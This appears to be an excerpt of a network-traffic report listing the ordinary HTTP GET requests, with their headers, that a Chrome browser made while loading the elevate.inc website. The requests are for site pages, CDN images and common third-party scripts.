Source: global traffic	HTTP traffic detected: GET /use-cases/benefit-platforms HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
Source: global traffic	HTTP traffic detected: GET /6537d1496ae55969d9298a91/65937a3a0452f1b9e23ad838_logo12.webp HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /654105530b98111cede036db/659d85daacb0ee65e4fec540_62abedd69e2a1d691620bb64_hrtech%2520(1).avif HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /use-cases/peo-software HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
Source: global traffic	HTTP traffic detected: GET /use-cases/health-plans HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
Source: global traffic	HTTP traffic detected: GET /654105530b98111cede036db/659d84d7482ac5ec161a85c2_63628f1c59c33f5363f3b113_employeebenefitnews-brand-logo-color-no-padding.svg HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /654105530b98111cede036db/659d85dad1c8ab250a1bb658_620a8fd2dbed87842d9c0a00_pr-newswire-logo.avif HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /654105530b98111cede036db/659d85dbc07d34d672d8712d_63628ee14a7843d2f27b559f_benefitspro-logo-865x295.avif HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /654105530b98111cede036db/659d84e639c50a31518316b0_64baf3d6c359f158a0977c2d_benefitspro.avif HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /654105530b98111cede036db/659d85db79bd0e25b6f57aec_62abf1504d07fa11cd45af6f_PYMNTS-logo-green%25201%2520(1).avif HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /654105530b98111cede036db/66e3279237aef04dc35516ef_benefitspro.avif HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /654105530b98111cede036db/66d8804d98330a06f1ef82a5_659d85dad1c8ab250a1bb658_620a8fd2dbed87842d9c0a00_pr-newswire-logo.avif HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /654105530b98111cede036db/659d84d6a02c61fd03773aef_620a8cd05162759375e5b000_employeebenefitnews-brand-logo-initials-01.svg HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /654105530b98111cede036db/659d84d6981620aca717f18b_645ab858fc8d736eb0ea829d_1200px-TechCrunch_logo.svg%2520(1).png HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /654105530b98111cede036db/659d84d64dab0e91b180b0a1_62d9e9960d2a19b98cd37877_benefitspro-footer-logo.webp HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /654105530b98111cede036db/659d84d642457f9a904abf3e_62029c49093069f37039eaba_technically%2520baltimore%2520logo.avif HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /654105530b98111cede036db/659d84d7f9942d052cbde9dd_62ab8fff6676244596d3e657_logo-1.avif HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /654105530b98111cede036db/659d84d8756d3958917d9c6a_61e83a62bf43923885d61816_built-in-colorado-logo.avif HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /654105530b98111cede036db/659d84d734ec4c1a87185071_61f964502425d5694395c0da_tech-crunch-logo.png HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /blog HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
Source: global traffic	HTTP traffic detected: GET /our-story HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
Source: global traffic	HTTP traffic detected: GET /654105530b98111cede036db/659d84d8482ac5ec161a86d9_64baf362c1aaca06d73b4f71_anthemis%2520insights.avif HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /why-elevate HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
Source: global traffic	HTTP traffic detected: GET /6537d1496ae55969d9298a91/65aecfb3e0847f76c91dfc6a_icon_automation.svg HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /6537d1496ae55969d9298a91/6814767b68efbf457c71041c_67213321960af3e15206fb23_670421de247a5a4a48c580f1_RMRlogo600dp1.avif HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /request-a-demo HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
Source: global traffic	HTTP traffic detected: GET /press HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
Source: global traffic	HTTP traffic detected: GET /654105530b98111cede036db/659d84d6a2501869585791dd_62029bc50941c284d8f4d49e_benefitspro%2520logo.avif HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9if-modified-since: Thu, 05 Jun 2025 21:46:58 GMTpriority: u=4, i
Source: global traffic	HTTP traffic detected: GET /npm/@finsweet/cookie-consent@1/fs-cc.js HTTP/1.1host: cdn.jsdelivr.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /npm/@finsweet/attributes-cmscombine@1/cmscombine.js HTTP/1.1host: cdn.jsdelivr.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /6537d1496ae55969d9298a91/65aecfb45ab1bb7a4a8ebddf_icon_third-party_1.svg HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /6537d1496ae55969d9298a91/658c59bd6f7007cb92213a3a_icon_finance_1.svg HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /6537d1496ae55969d9298a91/68146d8aceebfcc75b9b7b40_rippling.png HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /19524073.js HTTP/1.1host: js.hs-scripts.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /6537d1496ae55969d9298a91/658c475399e5cbfecce1c499_elevate%20-%20logo%20white.webp HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /6537d1496ae55969d9298a91/6830f94bb1339e06239d3298_Screens_2025_v3.png HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /6537d1496ae55969d9298a91/65aecfb356fccb79839880ab_icon_health-plans_1.svg HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /ajax/libs/gsap/3.12.5/gsap.min.js HTTP/1.1host: cdnjs.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /npm/@finsweet/attributes-cmsslider@1/cmsslider.js HTTP/1.1host: cdn.jsdelivr.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /js/jquery-3.5.1.min.dc5e7f18c8.js?site=6537d1496ae55969d9298a91 HTTP/1.1host: d3e54v103j8qbb.cloudfront.netorigin: https://www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: scriptreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic	HTTP traffic detected: GET /js/optimize.js?key=w6GQ23b4dMgP1RzEeKpkDq HTTP/1.1host: cdn.mida.sosec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /npm/@finsweet/attributes-cmssort@1/cmssort.js HTTP/1.1host: cdn.jsdelivr.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /login HTTP/1.1host: user.elevateaccounts.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/api.js?onload=turnstileLoad HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://player.vimeo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fb.js HTTP/1.1host: js.hsadspixel.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /npm/@finsweet/attributes-cmscore@1/cmscore.js HTTP/1.1host: cdn.jsdelivr.netorigin: https://www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: scriptaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic	HTTP traffic detected: GET /npm/@finsweet/attributes-animation@1/animation.esm.js HTTP/1.1host: cdn.jsdelivr.netorigin: https://www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: scriptaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic	HTTP traffic detected: GET /v2/19524073/banner.js HTTP/1.1host: js.hs-banner.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/g/91b8d9bf2593/api.js HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://player.vimeo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
